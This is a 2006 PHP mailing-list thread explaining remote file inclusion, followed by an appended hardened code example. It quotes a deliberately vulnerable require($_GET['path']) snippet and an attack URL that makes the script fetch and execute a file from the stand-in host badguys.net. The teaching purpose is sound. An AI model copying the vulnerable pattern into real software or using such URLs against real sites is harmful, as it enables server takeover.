At 9:13 PM +0000 11/14/06, Stut wrote:
Ok, so badscript.php is a bad name for this script. Let's say
show.php is a script you've written. You were tired, the kids were
running around you screaming and shouting, and you wrote something
like the following without really thinking about it...
<?php
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>
The *bad guy* can now hit the URL...
http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=
This causes show.php to include (i.e. execute!!) the remote file
injectionscript.txt from badguys.net at this URL...
http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php
Since this gets executed on your server it can do anything one of
your scripts can do. The only symptom would be that show.php will
not work for that request. Do the bad guys care? Probably not,
because by the time it fails they've already replaced your index.php
and potentially installed a rootkit, backdoors and whatever else
(depending, of course, on how locked down the web server is and your
file permissions).
Hope that makes sense now.
-Stut
-Stut:
Yes, I believe that the "require($_GET[])" is one of the things Chris
Shiflett talks about in his book. I should have guessed that was what
everyone was talking about. But, considering that I never do that and
my site was hijacked, I was thinking it must have been something
different.
It all makes sense now.
Sorry for being so dense.
Thanks everyone.
tedd
PS: My kids are too old to scream -- it's grand-kids now.
--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
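
A hardened counterpart to the show.php pattern quoted above, as an added example that is not part of the original thread: the request value only selects a key from a fixed allowlist and is never concatenated into the path handed to require. The function name resolve_include, the 'default' key and the temporary demo directory are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

/**
 * Map a request-supplied key to a directory from a fixed allowlist.
 * The request value is only used as an array key, so a URL or "../"
 * sequence in it can never become part of the path given to require.
 * (Hypothetical helper, not from the thread.)
 */
function resolve_include(string $key, array $allowedDirs, string $file): string
{
    if (!array_key_exists($key, $allowedDirs)) {
        throw new InvalidArgumentException('unknown include key');
    }
    // realpath() returns false for anything that is not an existing local path.
    $path = realpath($allowedDirs[$key] . DIRECTORY_SEPARATOR . $file);
    if ($path === false || !is_file($path)) {
        throw new RuntimeException('include file missing');
    }
    return $path;
}

// Constructed demo setup: a temporary directory standing in for the app's library dir.
$lib = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'show_demo_' . getmypid();
@mkdir($lib);
file_put_contents($lib . '/commonfuncs.inc.php', "<?php function greet() { return 'ok'; }\n");
$allowedDirs = ['default' => $lib];

// Constructed request values: one legitimate key, then the path value from the quoted URL.
$samples = ['default', 'http://badguys.net/injectionscript.txt?ignored='];
foreach ($samples as $value) {
    try {
        require_once resolve_include($value, $allowedDirs, 'commonfuncs.inc.php');
        echo "accepted: {$value} -> ", greet(), "\n";
    } catch (Exception $e) {
        echo "rejected: {$value} ({$e->getMessage()})\n";
    }
}

// Clean up the constructed demo files.
unlink($lib . '/commonfuncs.inc.php');
rmdir($lib);
```

As a second layer, PHP's allow_url_include ini setting (off by default since PHP 5.2.0) stops require and include from fetching remote URLs at all.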